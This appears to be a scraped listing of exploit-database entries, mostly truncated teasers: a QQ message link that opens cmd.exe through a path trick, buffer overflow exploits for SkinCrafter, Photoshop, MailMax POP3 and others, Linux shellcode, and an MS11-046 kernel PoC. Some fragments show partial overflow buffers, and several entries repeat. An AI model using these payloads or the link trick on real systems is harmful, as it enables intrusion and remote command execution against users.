腾讯TM、QQ消息远程命令执行漏洞

当用户发送此类格式“网址”的时候： codewww.baidu.com..............\Windows\System32\cmd.exe/code 对方接收之后，点击鼠标左键打开该网址的时候，会被当成路径打开，从而可以恶意执行一些程序、系统命令，造成严重安全隐患。 漏洞原理很简单，不解释了……，条件如下： 1、不能 url 编码，只能明文，囧rz…… 2、不能使用中、英文空格，路径会被“打断”。（可以试试自定义发包构造一下，或者尝试一下 Web 端发送。） 3、不能存在 % 号等特殊字符，原因和第一条一样。...

SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow

SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow Software : SkinCrafter from NMSoft Technologies Version : SkinCrafter version 3.0 Title : Buffer overflow in skincrafter3vs2005.dll of skinCrafter vs3.0 Link : http://www.skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip Date : May 17...

linux/x86 - polymorphic espeak shellcode - 45 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow

Software : SkinCrafter from NMSoft Technologies Version : SkinCrafter version 3.0 Title : Buffer overflow in skincrafter3vs2005.dll of skinCrafter vs3.0 Link : http://www.skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip Date : May 17, 2012 Tested on : XP SP2 The vulnerability lies in the...

linux/x86 execve/bin/dash 42 bytes

linux/x86 execve/bin/dash 42 bytes. Shellcode exploit for linux platform / linux/x86 execve/bin/dash 42 bytes Author : X-h4ck [email protected], [email protected] www.pirate.al , www.flashcrew.in Greetz : mywisdom - Danzel - Wulns - IllyrianWarrior- Ace - M4yh3m - Saldeath ev1lut1on - Lekosta -...

Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow

No description provided by source. ?php // Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements // Unicode Conversion Stack Based Buffer Overflow poc .dae // 32bit/SEH // // unicode overflow occurs when overlong asset elements are processed // one could be able to return inside an ASCII...

Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow

Exploit for windows platform in category local exploits ?php // Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements // Unicode Conversion Stack Based Buffer Overflow poc .dae // 32bit/SEH // // unicode overflow occurs when overlong asset elements are processed // one could be able to...

New Malware Found Exploiting Mac OS X Snow Leopard

Many Mac users recently have found themselves stumbling out of the darkness, shielding their eyes from the spotlight that attackers and malware writers are now shining on them. Malware having been a rarity on OS X, it’s taking some time to adjust, but while that’s happening the attackers are busy...

Samsung NET-i Viewer Active-X SEH Overwrite

' Exploit Title: SAMSUNG NET-i viewer ActiveX SEH Overwrite ' Date: April 30 2012 ' Author: Blake ' Software Link: http://www.samsungsecurity.com/product/productview.asp?idx=5828 ' Version: 1.37 ' Tested on: Windows XP SP3 with IE6 running on Virtualbox ' RequestScreenOptimization in...

CPE17 Autorun Killer 1.7.1 Buffer Overflow

CPE17 Autorun Killer 'CPE17 Autorun Killer %q readfile function is vulnerable it can be overflow , 'Author' = 'Xelenonz' , 'Version' = '0.1', 'Payload' = 'EncoderType' = Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' = 'BufferRegister'='ECX', , 'DefaultOptions' = 'DisablePayloadHandler' =...

RTF Pfragments exploit for MAC office 2008

No description provided by source. RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/...

Microsoft Windows - afd.sys Local Kernel (PoC) (MS11-046)

Microsoft Windows - afd.sys Local Kernel PoC MS11-046 / MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasifb1h2s just made the POC exploit...

MS11-046 Afd.sys Proof of Concept

Exploit for windows platform in category dos / poc / MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasifb1h2s just made the POC exploit...

Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046)

/ MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasifb1h2s just made the POC exploit available . Reference: ms8-66, ms6-49 Too lazy to add...

Microsoft Office 2008 SP0 (Mac) - RTF pFragments

RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Office 2007 for MC SP 0...

CastRipper 2.9.6 (.pls)/(wvx) buffer overflow Exploit

Exploit for windows platform in category local exploits Exploit Title: CastRipper 2.9.6 .pls/wvx buffer overflow Exploit Author: Caddy-Dz Facebook Page: http://www.facebook.com/ALG.Cyber.Army E-mail: islambabiaathotmail.com Vendor: http://mini-stream.net/castripper/ Category:: Local Exploits Test...

Mini-Stream RM-MP3 Converter 3.1.2.2 Buffer Overflow

Exploit Title : Mini-stream RM-MP3 Converter� V 3.1.2.2 Local Buffer OverFlow Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 Category : Local Code : Python Email : [email protected] WebSite :...

Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow

Exploit Title : Mini-stream RM-MP3 Converter� V 3.1.2.2 Local Buffer OverFlow Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 Category : Local Code : Python Email : [email protected] WebSite :...

MailMax 4.6 POP3 Buffer Overflow

!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...

MailMax 4.6 - POP3 USER Remote Buffer Overflow

MailMax 4.6 - POP3 USER Remote Buffer Overflow !/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffe...